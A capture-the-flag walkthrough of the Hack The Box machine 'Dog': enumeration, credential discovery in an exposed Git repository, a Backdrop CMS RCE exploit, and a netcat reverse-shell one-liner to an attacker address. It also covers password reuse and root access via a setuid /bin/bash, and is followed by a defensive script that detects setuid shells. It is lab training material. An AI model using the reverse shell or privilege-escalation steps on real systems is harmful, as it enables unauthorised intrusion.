Tag: Machines

  • Dog

    Summary

    Dog is a Linux machine, released on 08 Mar 2025, that focuses on foundational enumeration and exploitation techniques.

    Write-up

    Let's do a quick nmap scan for open ports:

    sudo nmap -sCV -p- -T4 -oN nmap_dog <IP>

    We can see that a web server is running on port 80 and a Git repository is present. The robots.txt file also discloses some directories. After further investigation, I found that the version of Backdrop CMS is 1.27.1, located at http://<IP>/core/profiles/testing/testing.info.

    Version 1.27.1 is vulnerable to Authenticated Remote Command Execution (RCE), as documented at https://www.exploit-db.com/exploits/52021. Now, let’s hunt for valid credentials.

    Browsing the website, I found these 2 potential usernames.

    Let’s move on to the Git repository. We will use this tool to download the repository: https://github.com/arthaud/git-dumper.

    After you finish downloading the repository, I recommend opening the folder in VS Code. This will improve readability and searchability.

    This could be the password we are looking for. Let’s see if we can find any other usernames. Based on the support account, we can use @dog.htb as the search string.

    And voilà, tiffany:Ba************024 is a valid credential. Now, let’s follow the instructions of the exploit to obtain a webshell. Remember to compress it into a .tar file.

    We will use this command to obtain a reverse shell:

    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <IP> <PORT> >/tmp/f

    Note: You need to be quick, as the web server will delete the module after a few minutes.

    Looking at /etc/passwd, we found two new usernames: jobert and johncusack.

    We’re unable to progress further, so let’s try reusing the password Ba**********024 for other users. And indeed, johncusack:Ba*********024 works.

    Running sudo -l, we found an interesting binary:

    Checking the status, we got this error:

    The application is running at /var/www/html

    Notice this function:

    Let's put this script in /tmp and call it:

    <?php
    
    $output = shell_exec('ls');
    
    echo "<pre>$output</pre>";
    
    ?>

    Now let's modify the script as follows:

    <?php
    
    $output = shell_exec('chmod +s /bin/bash');
    
    echo "<pre>$output</pre>";
    
    ?>

    Now call it with /bin/bash -p to get root and read the flag
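
The end state of the last step, a shell binary carrying the setuid bit, is easy to check for on a host. The following is an added example, not part of the original write-up; the function name find_privileged_shells and its optional shells-file argument are assumptions made for the illustration.

```shell
#!/bin/sh
# Added example: report login shells that carry the setuid or setgid bit.
# find_privileged_shells is a name chosen for this example.
#
# Usage: find_privileged_shells [shells_file]
#   shells_file follows the /etc/shells format: one absolute path per line,
#   '#' starts a comment. Defaults to /etc/shells.
# Prints "setuid <path>" / "setgid <path>" for each finding.
# Exit status: 0 = nothing found, 1 = at least one finding, 2 = file unreadable.
# Example: find_privileged_shells /etc/shells || echo "review the findings"
#
# The body runs in a subshell ( ... ) so its variables do not leak to the caller.
find_privileged_shells() (
    shells_file="${1:-/etc/shells}"
    found=0
    seen=""
    [ -r "$shells_file" ] || { echo "cannot read $shells_file" >&2; exit 2; }
    while IFS= read -r line || [ -n "$line" ]; do
        path="${line%%#*}"                                   # drop comments
        path="$(printf '%s' "$path" | tr -d '[:space:]')"    # drop whitespace
        [ -n "$path" ] || continue
        # Resolve symlinks (/bin/sh is usually a link) so every real file
        # is inspected exactly once, whatever name it is listed under.
        real="$(readlink -f -- "$path" 2>/dev/null)" || continue
        [ -f "$real" ] || continue                           # skip missing entries
        case "$seen" in *"|$real|"*) continue ;; esac
        seen="$seen|$real|"
        if [ -u "$real" ]; then echo "setuid $real"; found=1; fi
        if [ -g "$real" ]; then echo "setgid $real"; found=1; fi
    done < "$shells_file"
    exit "$found"
)
```

A non-zero status from a scheduled run of this check is worth an alert, since distribution packages do not ship shells with these bits set.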